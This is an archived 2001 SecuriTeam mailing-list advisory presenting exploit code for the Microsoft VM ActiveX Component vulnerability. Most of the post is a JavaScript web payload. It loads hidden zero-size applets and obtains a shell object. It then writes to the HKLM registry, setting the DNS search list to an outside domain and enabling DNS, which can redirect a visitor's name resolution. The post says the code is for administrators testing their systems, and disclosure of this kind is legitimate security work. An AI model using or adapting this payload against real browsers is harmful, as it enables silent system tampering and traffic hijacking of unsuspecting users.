[EXPL] JavaScript Can Write Anything to the Windows' Registry
From: support@securiteam.comDate: 09/02/01
- Previous message: support@securiteam.com: "[UNIX] Security Hole in OS Groupware Suite PHProjekt Patched"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] JavaScript Can Write Anything to the Windows' Registry Message-Id: <20010902151515.BAC17138C0@mail.der-keiler.de> Date: Sun, 2 Sep 2001 17:15:15 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
JavaScript Can Write Anything to the Windows' Registry
------------------------------------------------------------------------
SUMMARY
Some time ago, Microsoft has released a patch for:
<http://www.securiteam.com/windowsntfocus/6G00M0K02G.html> Microsoft VM
ActiveX Component vulnerability, the following is an exploit code for that
vulnerability (the patch was released over 11 months ago) allowing
administrator to test their system for the mentioned problem.
DETAILS
Exploit:
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
ADDITIONAL INFORMATION
The information has been provided by <mailto:marcin@jackowski.net> Marcin
Jackowski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Security Hole in OS Groupware Suite PHProjekt Patched"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
